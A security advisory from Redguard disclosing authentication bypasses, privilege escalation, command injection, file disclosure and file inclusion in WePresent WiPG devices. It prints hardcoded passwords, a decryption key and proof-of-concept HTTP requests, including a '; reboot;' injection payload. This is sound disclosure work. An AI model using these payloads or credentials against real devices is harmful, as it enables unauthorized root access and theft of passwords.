Security Advisory: Multiple vulnerabilities in WePresent WiPG devices -------------------------------------------------------------------------------- 1. Summary This advisory describes multiple vulnerabilities affecting the WePresent WiPG devices. Most of the issues covered by this advisory apply to the WiPG-1000, WiPG-1500 and the WiPG-2000. The vulnerabilities allow an unauthenticated attacker within the same network as the device to gain administrative access to its web interface as well as executing arbitrary code with root privileges on the device. 2. Vulnerable devices and versions All vulnerabilities have been discovered on the WiPG-1000 device and are likely to be present on the WiPG-1500 and WiPG-2000 as well but this has not been verified in all cases. The most current version of the firmware (2.0.0.7 at the time of writing) was used for the vulnerability research but quick cross-checks have indicated that many vulnerabilities were present in much older firmware versions as well. 3. Details 3.1 Web Interface Authentication Bypass The login.cgi script contains the hardcoded password 'aw%root?' (without quotes) for the administration area, which allows anyone with access to the network (or anyone if the device is exposed to the internet) to log in without knowing the password set by the regular administrator. This is problematic as the administration area should not be accessible by anyone not in possession of the correct password. In addition it should be noted, that it's not possible for any user to change this password which makes it impossible to change this administrative password except for applying a firmware patch that doesn't include this issue. Note: This backdoor does not appear to be present in the WiPG-2000 device. 3.2 Web Interface Privilege Escalation When changing the administrator's password in the web form the following request is sent: --- POST /cgi-bin/return_test.cgi HTTP/1.1 Host: 192.168.100.10 Content-Length: 96 Cache-Control: no-cache Origin: http://192.168.100.10 User-Agent: Agent Content-Type: application/x-www-form-urlencoded Accept: */* DNT: 1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,de;q=0.6 Connection: close command=Y5orvHOhpS3nxe9eLONG_ADMIN_PWD newpassword --- If one logs into the conference control panel on the web UI and then sends this exact request but inserts their own session ID (which is easily visible in the URL after logging in) instead, the password will be changed to the new value, allowing the attacker to login as administrator and thus escalate the user's privileges. Note: The underlying issue here is that the session management does not differentiate between administrative and moderator users. Instead this difference is handled entirely on the UI level by not showing moderator users direct links to administrative pages. Their session is valid for administrative access, however. 3.3 Authentication Bypass The return_test.cgi file (/home/boa/cgi-bin/return_test.cgi) handles various user requests, such as updating device preferences (or indeed changing passwords as seen in the previously described vulnerability), which sends a request in a pseudo-XML format, the first field of which is value and contains the current session ID, which is used to verify whether the request came from a legitimate user. If we manipulate the request and instead of the string 'session-id-here' send the string 'SetFlag' the device will omit the session ID check for this request and handles the request as though it came from an authenticated user. See below for a full proof of concept request: --- POST /cgi-bin/return_test.cgi HTTP/1.1 Host: 192.168.100.10 Content-Length: 1308 Cache-Control: no-cache Origin: http://192.168.100.10 User-Agent: Agent Content-Type: application/x-www-form-urlencoded Accept: */* DNT: 1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,de;q=0.6 Connection: close command=SetFlagNET_IP_TYPE 1NET_DHCP_EN1 NET_IPredactedNET_MASK redactedNET_GATEWAYredacted NET_DNSredactedWL_ESSID WiPG-1000WL_SWITCH0 WL_SSID_BROADCAST1WL_MODE 9WL_CHANNEL0WL_ENCRYPT 14WL_WPAKEYredacted WL_BANDWIDTH1APCLIENT_ONOFF 1APCLIENT_ESSIDredacted APCLIENT_ENCRYPT_MODE7 APCLIENT_ENCRYPT_KEYredacted SNMP_USER_NAMEadminSNMP_AUTH_PASSWORD AuthadminSNMP_PRIV_PASSWORDPrivadmin SNMPTRAPHOST0.0.0.0SNMP_ONOFF 1PREF_GATEKEEPER1 NTP_SYNC1NTP_SERVER_IP TIME_ZONEGMT-8_CHDOMAIN_NAME --- 3.4 OS Command Injection The rdfs.cgi (/home/boa/cgi-bin/rdfs.cgi) script is vulnerable to command injection. A specifically crafted string in the web form leads to arbitrary shell commands being executed on the device with root privileges. As a simple proof of concept insert the string `; reboot;` into the input field and press the download button. The device will execute the command and reboots. The cause of this vulnerability is that the string given by the user is inserted into the following command which is then executed: '/bin/awenc -e -i %s -o %s' See below for a full proof of concept request: --- POST /cgi-bin/rdfs.cgi HTTP/1.1 Host: 192.168.100.10 Content-Length: 37 Cache-Control: max-age=0 Origin: http://192.168.100.10 Upgrade-Insecure-Requests: 1 User-Agent: Agent Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 DNT: 1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,de;q=0.6 Connection: close Client=%3Breboot%3B&Download=Download --- Note: This script is assumed to be a development leftover as it doesn't appear to be ever presented to end users in any way during normal usage. If this is the case it should be removed from the system entirely. 3.5 Arbitrary File Disclosure The rdfs.cgi (/home/boa/cgi-bin/rdfs.cgi) script's intended functionality is to download an arbitrary file from the device. The encryption that is in place (the call to the /bin/awenc binary as seen in the command injection vulnerability above) is too weak to be any significant obstacle in exploiting this vulnerability. The encryption can easily be reversed by removing the first 512 bytes of an encrypted file and then shifting the leftover bytes by the hex values of the hardcoded key, which is '28825885"(("%((%mistral28825885' (without the single quotes). As there is no limitation on what file can be downloaded by using this feature, an attacker could download any file in an encrypted form and then easily decrypt its contents. This is particularly interesting as an attacker can read the cleartext passwords chosen for the admin and moderator users as well as the WiFi key by downloading the file '/tmp/scfgdndf'. 3.6 File Inclusion The 'login.cgi' (/home/boa/cgi-bin/login.cgi) contains a file inclusion vulnerability in the 'src' parameter. The file inclusion only appears to be working for files meeting certain criteria however, returning a 502 error for other files. The URL 'http://192.168.100.10/cgi-bin/login.cgi?lang=en&src=../../../bin/mountstor.sh' can be used as proof of concept. This vulnerability doesn't appear to have any severe impact as we weren't able to read any files containing information that couldn't be gained by simply extracting them from the firmware. 3.7 Insecure Maintenance Interface Requesting the url 'http://192.168.100.10/cgi-bin/login.cgi?lang=en&src=AwLoginRdtool.html' leads to a login page being served by the 'login.cgi' file, which allows anyone to log in as 'rdtool' using the hardcoded password 'mistral5885'. Once logged in, one can enable 'manufacture mode' or 'RD Debug mode', which enables the Telnet service on the device. The researchers were unable to discover the password for the root account during the time spent on this research, however anyone in possession of the password can enable Telnet and get a shell with root privileges on the device. 4. Credits * Matthias Brun (main researcher) * Sven Vetsch * Dominik Nufer 5. Timeline * 2017-02-17 Made initial contact with vendor. * 2017-02-20 Sent advisory to vendor and received confirmation of receipt. * 2017-03-20 Asked about status. Vendor confirmed the issues have been triaged and are being fixed. * 2017-03-27 Received answer confirming all items having been fixed. * 2017-04-09 Firmware version 2.2.3.0 released, fixing (according to the vendor) all disclosed vulnerabilities. * 2017-04-20 Public disclosure of advisory. 6. About Redguard Redguard is a Swiss-based information security company. We assist our clients with technical security testing as well as organisational security audits and consulting. This enables us to have a team with extensive experience in a wide variety of security relevant topics. https://www.redguard.ch contact@redguard.ch 7. Disclaimer This document is not meant to be a complete list of security issues for any of the mentioned devices and/or versions. It is possible and indeed likely that there are further security issues that are yet to be identified. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.